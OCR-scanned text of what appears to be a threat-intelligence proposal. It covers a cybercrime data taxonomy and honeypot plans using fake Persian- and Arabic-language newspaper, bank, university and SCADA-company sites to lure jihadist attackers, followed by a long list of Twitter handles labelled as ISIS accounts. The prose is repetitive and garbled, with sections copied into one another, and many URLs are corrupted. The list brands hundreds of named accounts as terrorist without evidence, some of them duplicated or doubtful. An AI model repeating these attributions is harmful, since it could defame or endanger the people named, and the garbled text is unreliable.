industry's largest data set of cybercrime activity 

for the purpose of real-time monitoring and profiling of 
malicious cybercrime activity successfully infiltrating 

the majority of cybercrime forum communities successfully 
establishing the foundations for an intelligence 

gathering process 

• the platform will be ultimately capable of real-time forum 
data localization for the purpose of successfully es¬ 
tablishing the foundations for a successful intelligence 
gathering process 

• the platform will be ultimately capable of establishing the 
foundations for real-time monitoring and profiling 

of malicious activity including forum member data 
successfully establishing the foundations for a successful 

intelligence gathering process 

• the platform will be ultimately capable of establishing the 
world's largest data set of historical cybercrime activity 

successfully establishing the foundations for a successful 
intelligence gathering process 

Return on Investment 

• research-based forum activity driven intelligence feeds 

• the company will be ultimately capable of offering 
subscription based type of intelligence driven services in- 



eluding intelligence and data-driven cybercrime and 
malicious-activity capable feeds 

• community-driven data processing capabilities 

• the company will be ultimately capable of offering public 
feeds to include the necessary data for the purpose of 

establishing an active community-based intelligence-data 
driven type of intelligence-data driven type of services 

and feeds 

• intelligence feed subscription type of managed 
intelligence-feed driven services 

• the company will be ultimately capable of offering tailored 
intelligence-driven data feeds successfully empower¬ 
ing security enthusiasts security experts researchers and 
government contractors with the necessary data and 

expertise to offer an insight into the company's vast 
network of data and intelligence driven type of services 

Company Data Project Taxonomy 

This intelligence brief will details the basic company project 
taxonomy structure for the purpose of establishing the 

foundations for a successful data and intelligence-driven 
type of research based type of cybercrime and malicious- 

activity tracking activity to include but not limited to 
cybercrime community forum data and active social media 
mon¬ 
itoring and, profiling capabilities. 



Cybercrime Sensor Network 
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This intelligence brief will details the basic company project 
taxonomy structure for the purpose of establishing the 
foundations for a successful data and intelligence-driven 
type of research based type of cybercrime and malicious- 
activity tracking activity to include but not limited to 
cybercrime community forum data and active social media 
mon¬ 
itoring and profiling capabilities. 

Spam Message 

• spam source 

• spam message 

• nation-state actors 

• malicious-adversaries 

• country 

• hosting provider 

• ASN 

• IP reputation 

• message 

• embedded URL 


embedded attachment 




Phishing Message 

• phishing source 

• phishing message 

• nation-state 

• malicious-actors 

• spear-phishing 

• targeted-attack 

• country 

• hosting provider 

• ASN 

• IP reputation 

• message 

• embedded URL 

• embedded attachment 
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Malicious Software 

• nation-state actors 

• malicious-adversaries 

• C &C phone back location 

• country 




• hosting location 

• ASN 

• screenshot 

• malicious MD5 
Malicious URL 

• nation-state actors 

• malicious-adversaries 

• country 

• hosting provider 

• ASN 

• client-side exploitation 

• client-side exploit sampl 
Android malware 

• nation-state actors 

• malicious-adversaries 

• C &C phone back 

• country 

• hosting provider 

• ASN 


SMS feature 




Screenshot 


• malicious MD5 
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Mac OS X malware 

• nation-state actors 

• malicious-adversaries 

• C &C phone back 

• country 

• hosting provider 

• ASN 

• Screenshot 

• malicious MD5 

Explanation of Honeypot Technology 

Honeypot technology greatly ensures that actionable and 
real-time data of jihadist activities can be acquired profiled 

and analyzed acting as an early warning system for jihadist 
activity online.lt relies on the systematic positioning of 

misconfigured network devices to better allow the use of 
monitoring sensors attracting malicious traffic leading to an 

eventual compromise allowing for better understanding of 
the motivation and capability estimation of the attacker 




including active motivation and capabilities type of 
attribution leading to the production of actionable real-time 
type 

of intelligence type of research and analysis type of data. 

Honepot Deployment Strategy 

Honeypot technology greatly ensures that actionable and 
real-time data of jihadist activities can be acquired profiled 

and analyzed acting as an early warning system for jihadist 
activity online. 

• Fake Newspaper - Al-Jihah 

The initial idea behind setting up a fake newspaper (in 
Persian, Arabic) would be to establish the foundation for a 

successful deceptive early warning system sensor further 
ensuring that actionable and real-time jihadist activity data 

can be collected profiled and interpreted for producing real¬ 
time intelligence summary reports. Daily updates with 

pro-jihadist material would ensure the quality acquisition of 
traffic including potential deceptive campaigns to be 

intercepted profiled an analyzed acting as an early warning 
system sensor further ensuring the collection of actionable 

real-time jihadist activities data. 

The Al-Jilah newspaper would act as a central repository for, 
various anti-jihad content successfully positioning the 

paper as a primary attack target for cyber jihadist online 
successfully increasing the probability for a successful 



attack 


and eventually collecting and interpreting the attack data. 
The Al-Jilah newspaper would act as a central repository 

of anti-jihad content and would be localized in Persian in 
Arabic successfully penetrating local and highly segmented 

markets for the purpose of increasing the probability of a 
successful attack. 

Various public placement strategy in terms of positioning 
the honeypot technology within the eventual attack 

compromise activity would include active search engine 
optimization techniques successfully leading to a great 

degree of capability estimation attack traffic and would also 
result in eventual direct forum placement within various 

prominent jihadist activity online forum communities. 
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• Fake Bank - Arabah Financing 

The initial idea behind setting up a fake bank (in Persian, 
Arabic) would be to establish the foothold of a deceptive 

campaign ensuring the collection of actionable real-time 
time jihadist data to be analyzed and profiled. Successfully 

positioning the bank within the network assets acquisition 
would ensure the collection of actionable and real-time 

jihadist data further ensuring the successful interception of 
jihadist activities online. 



The initial idea behind setting up a fake bank would be to 
successfully position a fake Web site successfully resulting 

in the active deployment of honeypot appliance 
technologies for the purpose of monitoring and profiling 
various 

jihadist activity online. Successfully setting up a fake bank 
in Persian and Arabic would result in the active penetration 

of various market segment properties successfully resulting 
in the active profiling and monitoring of jihadist activity 

online. 

Successfully setting up a fake bank would result in the 
active publication of content inter-related news releases 

emphasizing on major localized and segment released type 
of content successfully resulting in the active profiling 

and monitoring of various jihadist activity online.Successful 
positioning in terms of points of contact would ensure 

active phishing and malware attack profiling and monitoring 
successfully resulting in active profiling and monitoring 

of jihadist activity online. 

• Fake university - Abkazah University 

The initial idea behind setting up a fake university (in 
Persian, Arabic) would be to establish the foothold of a 
deceptive 

campaign ensuring the collection of actionable real-time 
time jihadist data to be analyzed and profiled. Successfully 



positioning the bank within the network assets acquisition 
would ensure the collection of actionable and real-time 

jihadist data further ensuring the successful interception of 
jihadist activities online.Successful positioning in terms 

of points of contact would ensure active phishing and 
malware attack profiling and monitoring successfully 
resulting 

in active profiling and monitoring of jihadist activity online. 

The initial idea of setting up a fake university would result in 
the active profiling and monitoring of various jihadist 

community type of jihadist activity online successfully 
positioning a localized in Persian and Arabic fake university 

successfully resulting in the active profiling and monitoring 
of jihadist activity online. Sample fake university content 

type of localized fake university portfolio of facilities and 
educational courses would result in the active positioning 

fora localized and segmented active profiling and 
monitoring of jihadist activity online. 

It would consist of active SCADA research and cyber security 
type of research and analysis facility allowing the active 

monitoring of malicious activity, for the origin source 
country Iran, Pakistan, Saudi Arabia, Iraq and 
Syria.Successful 

positioning in terms of points of contact would ensure active 
phishing and malware attack profiling and monitoring 



successfully resulting in active profiling and monitoring of 
jihadist activity online. 

• Fake Company - Ostan Industries 

The initial idea behind setting up a fake company would be 
to successfully intercept and profile actionable real-time 

jihadist activities online to successfully intercept and profile 
various jihadist activities online.The initial idea behind 

setting up a fake company would be to position a SCADA 
type of infrastructure localized in Persian, Arabic for the 

purpose of successfully profiling and monitoring various 
jihadist activity online. 

With a successful placement and active content generating 
localized in Persian, Arabic a fake company deployment 

using honeypot appliance technology would result in active 
capability estimation and profiling of various jihadist 
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activity online.Successful positioning in terms of points of 
contact would ensure active phishing and malware attack 
profiling and monitoring successfully resulting in active 
profiling and monitoring of jihadist activity online. 

Cyber Jihad Sensor Network 

This intelligence brief will details the basic company project 
taxonomy structure for the purpose of establishing the 

foundations for a successful data and intelligence-driven 
type of research based type of cybercrime and malicious- 



activity tracking activity to include but not limited to 
cybercrime community forum data and active social media 
mon¬ 
itoring and profiling capabilities. 

• forum topic 

the platform will be ultimately capable of processing a 
particular forum topic for the purpose of establishing the 

foundations for a successful intelligence gathering process 

• forum message 

the platform will be ultimately capable of processing a 
particular forum message for the purpose of establishing the 

foundations for a successful intelligence gathering process 

• forum member 

the platform will be ultimately capable of processing a 
particular forum member for the purpose of establishing the 

foundations for a successful intelligence gathering process 

• forum member message 

the platform will be ultimately capable of processing a 
particular forum member message for the purpose of 

establishing the foundations for a successful intelligence 
gathering process 

• forum message 



- the platform will be ultimately capable of processing a 
particular forum message for the purpose of establishing the 

foundations for a successful intelligence gathering process 

• forum message 

- the platform will be ultimately capable of processing a 
particular forum external message for the purpose of 

successfully establishing the foundations for a successful 
intelligence gathering process 

• forum time 

- the platform will be ultimately capable of processing a 
particular forum time for the purpose of establishing the 

foundations for a successful intelligence gathering process 
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• forum data 

the platform will be ultimately capable of processing data 
including date time message url email ultimately establish¬ 
ing the foundations for a successful intelligence gathering 
process 

• forum URL 

the platform will be ultimately capable of processing a 
particular forum URL further establishing the foundation for 

the Obnomix platform further establishing the foundations 
for a successful intelligence gathering process 



• forum media 

the platform will be ultimately capable of processing forum 
media further establishing th foundations for the 

Obnomix platform further establishing the foundations for a 
successful intelligence gathering process 

• forum email 

the platform will be ultimately capable of processing forum 
email further establishing the foundations for the 

Obnomix platform further establishing the foundations for a 
successful intelligence gathering process 

• forum contact 

the platform will be ultimately capable of processing forum 
contact further establishing the foundations for the 

Obnomix platform further establishing the foundations for a 
successful intelligence gathering process 

Sample ISIS Social Media Twitter Accounts: 

• https://twitter.com/As_soumaly 

• https://twitter.com/wilayat _cairo56 

• https://twitter.com/ISmisMUJAHIDAH 

• https://twitter.com/islamdamasl980 40k 

• https://twitter.com/HA _alshami03 

• https://twitter.com/jundi71033868 




• https://twitter.com/nor92331 

• https://twitter.com/WmWmWm57 

• https://twitter.com/tytxzxxz 

• https://twitter.com/raisiiiiii 

• https://twitter.com/FIIIIII2015 
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• https://twitter.com/BrCdPrsnr 

• https://twitter.com/leembfs2017 

• https://twitter.com/Sheb84669751 

• https://twitter.com/GMCTNT _1979 

• https://twitter.com/i593162 

• https://twitter.com/bela _hudood 

• https://twitter.com/_u_r7yok 

• https://twitter.com/kalmat _haaq 

• https://twitter.com/meersbo2 

• https://twitter.com/iahmd61 

• https://twitter.com/TurMedia316 

• https://twitter.com/shamtu _33 

• https://twitter.com/hoecl5 

• https://twitter.com/N41lll 





https://twitter.com/AIJabarti45 

https://twitter.com/abo _roqaia82 

https://twitter.com/inmyheartisis 

https://twitter.com/gurababizl551 

https://twitter.com/jhkghjy 

https://twitter.com/Hero Jsis _711 

https://twitter.com/itc _hallo 

https://twitter.com/TurMedia316 

https://twitter.com/JUI _LJ 

https://twitter.com/SomQaeda 

https://twitter.com/TARLEE4 

https://twitter.com/Muj _93 _Hed 

https://twitter.com/dieebkhel 

https://twitter.com/HJdjdu 

https://twitter.com/anwartab 

https://twitter.com/SYRIA _GID 

https://twitter.com/Xkb038 
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• https://twitter.com/MKoshur2 

• https://twitter.com/abutalut8 




• https://twitter.com/AEJKhalil 

• https://twitter.com/abu2legend 

• https://twitter.com/Gqeflfwlemqpdmf 

• https://twitter.com/alhlby027 

• https://twitter.com/SuehwShehe 

• https://twitter.com/sdsdsd325245 

• https://twitter.com/gffgglll 

• https://twitter.com/ISIS _1979GMC 

• https://twitter.com/dola24687 

• https://twitter.com/timbosulli 

• https://twitter.com/f75da586675f456 

• https://twitter.com/khilafahinfos 

• https://twitter.com/allbasra 

• https://twitter.com/Muhaajirah _ 

• https://twitter.com/abufalahalhind4 

• https://twitter.com/Saeed alHalabiO 

• https://twitter.com/iislamicl2 

• https://twitter.com/TaWhEeD_0 

• https://twitter.com/avuOmar _shams 

• https://twitter.com/abouanstunisi 




• https://twitter.com/homsiia 

• https://twitter.com/4_7m0o0d 

• https://twitter.com/ Djoiyriajw 

• https://twitter.com/96176629289 

• https://twitter.com/killer_cail99 

• https://twitter.com/mfawasl 

• https://twitter.com/ohatab8 

• https://twitter.com/Ultrasmusliml 

• https://twitter.com/A05462492 
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• https://twitter.com/azve76 

• https://twitter.com/ClemStalDim 

• https://twitter.com/mahmood 

• https://twitter.com/aqill41 

• https://twitter.com/iahmd61 

• https://twitter.com/azve76 

• https://twitter.com/PicotNo 

• https://twitter.eom/h _a _e _23 

• https://twitter.com/goo_ias 

• https://twitter.com/_irl_toby6 




• https://twitter.com/samhalo 

• https://twitter.com/samhalo 

• https://twitter.com/rdcongo _news 

• https://twitter.com/hytegetydyte 

• https://twitter.com/f75da586675f456 

• https://twitter.com/Muj _93 _Hed 

• https://twitter.com/abohashmily 

• https://twitter.com/Alhareth_2 

• https://twitter.com/wfsfsd 

• https://twitter.com/FoopSeven 

• https://twitter.com/azve77 

• https://twitter.com/Ali G303L 

• https://twitter.com/R9O7GupXDM0b0pd 

• https://twitter.com/georgebintol 

• https://twitter.com/nightwalker_74he 

• https://twitter.com/ahmadvasvv565 

• https://twitter.com/Ansar _AIShariaO 

• https://twitter.com/Alsloli _dog/media 

• https://twitter.com/inmyheartisis 

• https://twitter.com/om _elbarael 




• https://twitter.com/saadsaudi2014 
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• https://twitter.com/timotim91217281 

• https://twitter.com/ii_o_01ru 

• https://twitter.com/aljanady75 

• https://twitter.com/KatzOUmAIBaraaO 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/Misk_2_a 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 

• https://twitter.com/Omisshaq 

• https://twitter.com/qatada 93 

• https://twitter.com/ls_zarkiue 

• https://twitter.com/Ali _G303L 

• https://twitter.com/fgh959 

• https://twitter.com/sdg42303540 

• https://twitter.com/alptter_ 

• https://twitter.com/umaisha55 

• https://twitter.com/algwsd2233 

• https://twitter.com/dfgndf2 




• https://twitter.com/leembfs2017 

• https://twitter.com/wearekillkofar 

• https://twitter.com/Om _islam47 

• https://twitter.com/islamic Jso 

• https://twitter.com/ a _a _20 

• https://twitter.com/truth _ee 

• https://twitter.com/Fahad Buhend 

• https://twitter.com/lmj _hallo 

• https://twitter.com/er_er_500 

• https://twitter.com/86Roben 

• https://twitter.com/DsdsdsfSddsd 

• https://twitter.com/abu _a _88 

• https://twitter.com/sadkingp20 
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• https://twitter.com/noor_sban6 

• https://twitter.com/is5 _is5 

• https://twitter.com/JUI _LJ 

• https://twitter.com/qatada _9 

• https://twitter.com/abo _al _zubair 

• https://twitter.com/0thmanl4 _C4 




• https://twitter.com/nedalo9314 

• https://twitter.com/SamalQ__90 

• https://twitter.com/Mar44ma 

• https://twitter.com/Manaln9 

• https://twitter.com/phupeuea 

• https://twitter.com/raisiiiiii 

• https://twitter.com/aljanady75/ 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/Misk_2_a 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 

• https://twitter.com/198 _mazen 

• https://twitter.com/CavalierDuSham 

• https://twitter.com/SinaiTor 

• https://twitter.com/NaserlS8 

• https://twitter.com/oumme _aymenlO 

• https://twitter.com/gaznaya 

• https://twitter.com/un _serviteur 

• https://twitter.com/Tekindebeyvin 

• https://twitter.com/ DavidThomson 





• https://twitter.com/VegetaMoustache 

• https://twitter.com/Millatlbrahiml 

• https://twitter.com/Hayati JJLLah _ 

• https://twitter.com/Alittl245 

• https://twitter.com/salehalawlqil 
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• https://twitter.com/SimNasr 

• https://twitter.com/xonraqqa 

• https://twitter.com/aodaaoda4 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/anwartab 

• https://twitter.com/waswa0127 

• https://twitter.com/ali523480 

• https://twitter.com/Rhbdbdl 

• https://twitter.com/AnsarAISharial3 

• https://twitter.com/AIJabarti46 

• https://twitter.com/lslamiyaKurdi 

• https://twitter.com/zayanepower 

• https://twitter.com/WalaAndBara 

• https://twitter.com/SFKIIIHHF _ _o033 




• https://twitter.com/AAdhimlO 

• https://twitter.com/MhdSayf 

• https://twitter.com/abo _67 _omar 

• https://twitter.com/DawlaBrulFrance 

• https://twitter.com/strange76292811 

• https://twitter.com/Vbnlsrt 

• https://twitter.com/IS_IS021 

• https://twitter.com/IS_IS022 

• https://twitter.com/AbdAllahGaza 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/iislamicl2 

• https://twitter.com/ajmurgent 

• https://twitter.com/baqiya79R 

• https://twitter.com/abujamaludeen02 

• https://twitter.com/ibn _abdiqany 

• https://twitter.com/killercat600 

• https://twitter.com/MisciFromTheD 
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• https://twitter.com/3aam _AI _Diri 

• https://twitter.com/mnhtye 




• https://twitter.com/block_151 

• https://twitter.com/Hijazi _9111 

• https://twitter.com/ibn _dyala93 

• https://twitter.com/jxcjcjl 

• https://twitter.com/mosalmal991 

• https://twitter.com/rfvb7 

• https://twitter.com/alaserlOO 

• https://twitter.com/asd4000hd 

• https://twitter.com/AbdAllahGaza 

• https://twitter.com/MhdSayf 

• https://twitter.com/aqaqlqa 

• https://twitter.com/mhuncl231 

• https://twitter.com/azdyisis55 

• https://twitter.com/Baghdad9191 

• https://twitter.com/74ghl 

• https://twitter.com/nnbb77881 

• https://twitter.eom/a _t _ _29 _ _7a 

• https://twitter.com/Kh_nsal43 

• https://twitter.com/theykillmybro 

• https://twitter.com/210Birdy 




• https://twitter.com/daish90 

• https://twitter.eom/A_A _c 

• https://twitter.com/soman611 

• https://twitter.com/qwerwoow 

• https://twitter.com/fojraqqa 

• https://twitter.com/saegr2 

• https://twitter.com/ezzislamm 

• https://twitter.com/ach3ari _maliki 

• https://twitter.com/Ansar5433 
149 

• https://twitter.com/waja__l 

• https://twitter.com/lslamic _3344 

• https://twitter.com/0j7jl (doe 

• https://twitter.com/zeses2 

• https://twitter.com/abu _a _89 

• https://twitter.com/medad _medl 

• https://twitter.com/block_151 

• https://twitter.com/Alkurdil995 

• https://twitter.com/haydra2233 

• https://twitter.com/Asirat _Tunisial 




• https://twitter.com/Rouba56 

• https://twitter.com/KA_N7 

• https://twitter.com/bwwwg 

• https://twitter.com/aljabri354 

• https://twitter.com/msaks241 

• https://twitter.com/wffffll089 

• https://twitter.com/Djjjdjd4 

• https://twitter.com/parislNHELL 

• https://twitter.com/llll32llll 

• https://twitter.com/Daaeem51 

• https://twitter.com/malekaty891 

• https://twitter.com/mouwa7ed _03 

• https://twitter.com/sunnahthlOOO 

• https://twitter.com/R_nxxt_l 

• https://twitter.com/qq _qq _79 

• https://twitter.com/rkrk4m25 

• https://twitter.com/OT_IN57 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/adgrl9 

• https://twitter.com/Njd __zz77zz 




• https://twitter.com/Hhgff26176827 
150 

• https://twitter.com/OOUItraOO 

• https://twitter.com/rkrk4m25 

• https://twitter.com/rkrk4m26, 

• https://twitter.com/rkrk4m27 

• https://twitter.com/rkrk4m28 

• https://twitter.com/rkrk4m29 

• https://twitter.com/rkrk4m30 

• https://twitter.com/rkrk4m31 

• https://twitter.com/rkrk4m32 

• https://twitter.com/kaj__s 

• https://twitter.com/ABu AlAylnaa 

• https://twitter.com/ABO _SLEMAN _9 

• https://twitter.eom/d _mf33 

• https://twitter.com/Turbo _zahid 

• https://twitter.com/ww _cvf 

• https://twitter.com/IITIIillTII 

• https://twitter.com/CF _G66 

• https://twitter.com/abujuuad 




• https://twitter.com/isis_2277 

• https://twitter.com/Asdl5Wreg 

• https://twitter.com/abcdfghjkll2 

• https://twitter.com/71AprVISHV18VIP 

• https://twitter.com/Ha23ra3F987 

• https://twitter.com/UiU_o_UiU 

• https://twitter.com/isuwh 

• https://twitter.com/lll__Heart 

• https://twitter.com/Sabaa760 

• https://twitter.com/zajell8 

• https://twitter.com/clockwise75 

• https://twitter.com/jxcjcjl 

• https://twitter.com/gjdfoi221qw 
151 

• https://twitter.com/smjh2154 

• https://twitter.com/Aymanjrjr2 

• https://twitter.com/khatabb66 

• https://twitter.com/sor_hall 

• https://twitter.com/isis_1188 

• https://twitter.com/allmah89 




• https://twitter.com/j3x_w8p 

• https://twitter.com/om _ansl02 

• https://twitter.com/mfawl8 

• https://twitter.com/dfgvdffcxx 

• https://twitter.com/ississ_is 

• https://twitter.com/DrAlnefisi 

• https://twitter.com/Abovaseer34 

• https://twitter.com/zeydusame5 

• https://twitter.com/KH50380 

• https://twitter.com/dskvnsflk/ 

• https://twitter.com/Cano65525269 

• https://twitter.com/AL_adnani 69 

• https://twitter.com/isnacon0020 

• https://twitter.com/lvj7165d 

• https://twitter.com/zeses2 

• https://twitter.com/asloly_Ws5 

• https://twitter.com/alansari32MMOMM 

• https://twitter.com/hajedll4 

• https://twitter.com/aboalhsnllll 

• https://twitter.com/paris_pigs 





• https://twitter.com/ibn _abdiqany 

• https://twitter.com/zzzassertty233 

• https://twitter.com/Bbdbd8 

• https://twitter.com/mozamjaer _16 

• https://twitter.com/TNT7mslm7 
152 

• https://twitter.com/isis_7744 

• https://twitter.com/ayshafalaste2 

• https://twitter.eom/d _mlla 

• https://twitter.com/Dhhd4874 

• https://twitter.com/Dr _MagedMohamad 

• https://twitter.com/omarl4373 

• https://twitter.com/cyberkhilafa05 

• https://twitter.com/IIH32llll 

• https://twitter.com/Dhhd4874 

• https://twitter.com/akhy01 

• https://twitter.com/jahezonal3 

• https://twitter.com/71AprVISHV18VIP 

• https://twitter.com/HuChuin_63 

• https://twitter.com/Katusha __28 




• https://twitter.com/Aamnl45Aamn 

• https://twitter.com/Njd __zz77zz 

• https://twitter.com/DERA_AR 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/Cbhjl80 

• https://twitter.com/syppmgyfsvx34 

• https://twitter.com/abu2legend 

• https://twitter.com/cyberkhilafa05 

• https://twitter.com/asrtyuyufhd 

• https://twitter.com/abo33dojanal992 

• https://twitter.com/GHOTA AHRAR _ 

• https://twitter.com/bhCotn 

• https://twitter.com/aboferasalhalab 

• https://twitter.com/sdg42303540 

• https://twitter.eom/M _Alfstaat 

• https://twitter.com/Amatullah _222 

• https://twitter.com/ward _aljanh 
153 

• https://twitter.com/arradarl 

• https://twitter.com/aslan555111 




• https://twitter.com/Saifaljzrawi 

• https://twitter.com/abo_ali442 

• https://twitter.com/114Muawiya 

• https://twitter.com/JonnyDavid2 

• https://twitter.com/khilafatekrit 

• https://twitter.com/an _qa3 

• https://twitter.com/mhmdfaisel 

• https://twitter.com/seto_maiko 

• https://twitter.com/_17G_ 

• https://twitter.com/kjul03 

• https://twitter.com/bent _A1 

• https://twitter.com/abufalahalhind4 

• https://twitter.com/mustafaklshl2 

• https://twitter.com/abuhurairahl03 

• https://twitter.com/jihadist_s 

• https://twitter.com/Saeed alHalabiO 

• https://twitter.com/ValkryV5 

• https://twitter.com/zd__bu 

• https://twitter.com/xl50isisa 

• https://twitter.com/moslem _1110 





• https://twitter.com/Hdlsishd 

• https://twitter.com/iislamicl2 

• https://twitter.com/SFKIIIHHF __o033 

• https://twitter.com/block_151 

• https://twitter.com/ibn _e umarr 

• https://twitter.com/ibn _e umarr 

• https://twitter.com/wilayet _alhabas 

• https://twitter.com/aadr40 

• https://twitter.com/alill2777 
154 

• https://twitter.com/abuanas_13 

• https://twitter.com/mlb2q 

• https://twitter.com/ir_12_aq 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/Muhaajirah _ 

• https://twitter.com/Bukhari 1 

• https://twitter.com/Dawlastan 

• https://twitter.com/Fahad Buhendi 

• https://twitter.com/baqiya79R 

• https://twitter.com/mustafaklashil2 




• https://twitter.com/VegetaMoustache 

• https://twitter.com/norry28974869 

• https://twitter.com/dherghamm31 

• https://twitter.com/clash _eshke 

• https://twitter.com/maheridlbel 

• https://twitter.com/lbrahimNomay 

• https://twitter.com/eysaneyw22 

• https://twitter.com/abubakrl435 

• https://twitter.com/bodyking8484 

• https://twitter.com/AL_21 

• https://twitter.com/nasirulddin 

• https://twitter.com/abubakrl435 

• https://twitter.com/bodyking8484 

• https://twitter.com/BghdlOO 

• https://twitter.com/_ihsen _086 _ 

• https://twitter.eom/q_zx4 

• https://twitter.com/Ali G303L 

• https://twitter.com/Ali _G303L 

• https://twitter.com/Abohatem _8 

• https://twitter.com/abohatiml22 





• https://twitter.com/41invasion 
155 

• https://twitter.com/Ad98Dawla 

• https://twitter.com/ShShlondon2027 

• https://twitter.com/xcvraqqa 

• https://twitter.com/rtjfwgr 

• https://twitter.com/ahmed88a2 

• https://twitter.com/nomangias 

• https://twitter.com/moosabm738 

• https://twitter.com/yfh _gcj 

• https://twitter.com/vrjevvel 

• https://twitter.com/Anti _lying73 

• https://twitter.com/OIOasmar 

• https://twitter.com/nsarllO 

• https://twitter.com/al_ganh__2 

• https://twitter.com/sahabaarmyl2 

• https://twitter.com/ab__ub 

• https://twitter.com/sahabaarmyl2 

• https://twitter.com/sahabasupportl 

• https://twitter.com/ReportSahaba4 




• https://twitter.com/isis_hd _aus 

• https://twitter.com/jasadiq423 

• https://twitter.com/radjurijal 

• https://twitter.com/annushroh 

• https://twitter.com/Khoiru _Ummah05 

• https://twitter.com/Muhaajirah _ 

• https://twitter.com/abuomar79_ 

• https://twitter.com/sriyanto andi 

• https://twitter.com/abu _haidarabu8 

• https://twitter.com/lnghemasiyyin 

• https://twitter.com/AbuQilabah _ 

• https://twitter.com/daulahi 

• https://twitter.com/Zahed_911 
156 

• https://twitter.com/jejak _salaf 

• https://twitter.com/MansurahThaifah 

• https://twitter.com/alFaruuq Media 

• https://twitter.com/lbnahAsyiqah 

• https://twitter.com/lstisyhadi 

• https://twitter.com/HadyGusti 




• https://twitter.com/virusSEVEN 

• https://twitter.com/muhaimin _777 

• https://twitter.com/agus _alsundawi 

• https://twitter.com/abuaqilla6 

• https://twitter.com/jonosersan 

• https://twitter.com/Fakta _IS 

• https://twitter.com/Ultrasmusliml 

• https://twitter.com/UmmuShabrinal 

• https://twitter.com/AbuRpg9 

• https://twitter.com/Sara231Abdullah 

• https://twitter.com/padri _kaandi776 

• https://twitter.com/aleim_aray 

• https://twitter.com/lnshaSyahid 

• https://twitter.com/UsaidAshShohroo 

• https://twitter.com/MIT_Voice 

• https://twitter.com/rizkil50712 

• https://twitter.com/lovely _ _ummi 

• https://twitter.com/Ar_Zanll 

• https://twitter.com/HazlMuhammad 

• https://twitter.com/musaalindunisy 




• https://twitter.com/Hamba Allahswt 

• https://twitter.com/FA_Muntaqo 

• https://twitter.com/ibraheem52s 

• https://twitter.com/Shamilndunisy 

• https://twitter.com/abo _zax 
157 

• https://twitter.com/al_qurani 

• https://twitter.com/enemtop2 

• https://twitter.com/madhankhan0653 

• https://twitter.com/abu jnanshurl 

• https://twitter.com/abu __aisyah5 

• https://twitter.com/rikwanhadi 

• https://twitter.com/dedihardi 

• https://twitter.com/Yayaz_coz %20 

• https://twitter.com/AI Jndunisiy 

• https://twitter.com/hazone89 

• https://twitter.com/Azam _lsmail96 

• https://twitter.com/AbuDzakiyyah2 

• https://twitter.com/Ummu _Raqqy 

• https://twitter.com/SasDarlslam 




• https://twitter.com/tauhidwaljihad 

• https://twitter.com/mhd _fachry 

• https://twitter.com/KMaghaazii 

• https://twitter.com/abu Jbnihi 

• https://twitter.com/JENGKINGMALAYA 

• https://twitter.com/zackmustafa86 

• https://twitter.com/mankasim88 

• https://twitter.com/Daulah _dais 

• https://twitter.com/keepsilenttt 

• https://twitter.com/ibnualkhaleed 

• https://twitter.com/AbuSyamilsyams 

• https://twitter.com/khilaFahi77 

• https://twitter.com/lkhwanDibanned 

• https://twitter.com/bintangmelatil 

• https://twitter.com/Ukhti _Daeng 

• https://twitter.com/AbuShaffa 

• https://twitter.com/arlin _manson 
158 

• https://twitter.com/akh _razid 

• https://twitter.com/AbuYahya _ 




• https://twitter.com/PanglimaKribo 

• https://twitter.com/554Gen 

• https://twitter.com/abujamal2129 

• https://twitter.com/abujamal2129 

• https://twitter.com/abughibranl 

• https://twitter.com/Hamba 001 

• https://twitter.com/Adeen70 

• https://twitter.com/anisaa202 

• https://twitter.com/sukumaran _15 

• https://twitter.com/med _fajr 

• https://twitter.com/Jundullahalind5 

• https://twitter.com/ferdij521 

• https://twitter.com/bintmuq 

• https://twitter.com/Ansarlndo007 

• https://twitter.com/Abu _lbraheem_23 

• https://twitter.com/abumahmoud444 

• https://twitter.com/AbdulKhaaliq86 

• https://twitter.com/FaruqAlbany 

• https://twitter.com/abu ahmedagain 

• https://twitter.com/antipancasila5 




• https://twitter.com/goremaja Jslam 

• https://twitter.com/AbuMalaziy 

• https://twitter.com/muslim _share 

• https://twitter.com/alhisbahcom 

• https://twitter.com/Azharine92 

• https://twitter.com/kittyloversl453 

• https://twitter.com/ann219187 

• https://twitter.com/AseeraFiDunya 

• https://twitter.com/al _brijef 
159 

• https://twitter.com/MuslimPrisoners 

• https://twitter.com/sitizahral704 

• https://twitter.com/MohammadAntonP 

• https://twitter.com/AlfathKampung 

• https://twitter.com/ali005 saif 

• https://twitter.com/DebuPertempuran 

• https://twitter.com/Abu__Hanan 

• https://twitter.com/AJundu 

• https://twitter.com/abo_maleek 

• https://twitter.com/al Jndonesi 




• https://twitter.com/lbrahimMedial 

• https://twitter.com/Ari _al Jndonesi 

• https://twitter.com/rafaiejem 

• https://twitter.com/abufatih380 

• https://twitter.com/saifulizuwan90 

• https://twitter.com/AMaliziya 

• https://twitter.com/Mujahideen670 

• https://twitter.com/Abu Baraal 

• https://twitter.com/abouabdullah7 

• https://twitter.com/anjemchoudary 

• https://twitter.com/lbnNuhaas 

• https://twitter.com/onthatpath3 

• https://twitter.com/belgikie 

• https://twitter.com/AIMaghrebiyyah 

• https://twitter.com/HeadShots4Toge 

• https://twitter.com/BakrSomali 

• https://twitter.com/syuhada _umar 

• https://twitter.com/DBerdarah 

• https://twitter.com/BergPaling 

• https://twitter.com/baretta384 




• https://twitter.com/AmrullohAkbar 
160 

• https://twitter.com/dirjmc 

• https://twitter.com/iimbaasyir 

• https://twitter.com/IKalasnikov 

• https://twitter.com/Forum _AI _Busyro 

• https://twitter.com/Gashibu 

• https://twitter.com/WF4WF4 

• https://twitter.com/EhsanAhrar5 

• https://twitter.com/ajnadmaghr47 

• https://twitter.com/soly_ia 

• https://twitter.com/janah sabiI 

• https://twitter.com/LucasAnton58 

• https://twitter.com/lkjhgasdfll 

• https://twitter.com/saeafl986 

• https://twitter.com/63Bal7q 

• https://twitter.com/SdffksoJ 

• https://twitter.com/abubkertrkomtrk 

• https://twitter.com/abo _askndrll66 

• https://twitter.com/andre _poulin49 




• https://twitter.com/seragggggg08 

• https://twitter.com/orchl23 

• https://twitter.com/hamah _094 

